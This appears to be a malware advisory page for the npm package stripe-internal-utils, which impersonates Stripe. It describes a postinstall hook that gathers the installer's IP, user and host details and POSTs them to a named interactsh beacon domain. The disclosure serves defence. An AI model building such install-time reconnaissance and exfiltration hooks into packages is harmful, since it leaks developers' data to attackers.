stripe-internal-utils @8.2.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4184
Ecosystem
npm
Summary
package.json declares a postinstall hook that auto-fires on npm install and performs reconnaissance + exfiltration against the installer. The inline node -e payload fetches the installer's public IP from api.ipify.org, executes id || ver && whoami && hostname via child_process.exec, and POSTs a JSON body containing the timestamp, USERDOMAIN/USERDNSDOMAIN/COMPANY environment variables, public IP, hostname, current working directory, and shell command output to a hardcoded interactsh beacon at lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun over HTTP. The package's own description self-identifies as 'Full RCE PoC -osama', and the package name impersonates the Stripe brand to lure installers into a name they would plausibly trust. Any developer or build system running npm install stripe-internal-utils leaks identifying host and user information to the attacker.
Source: amazon-inspector (b6add7fd3034c5b0d00e39e2cbfeb7c664085ef412612b53ebe9fd81767449be)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.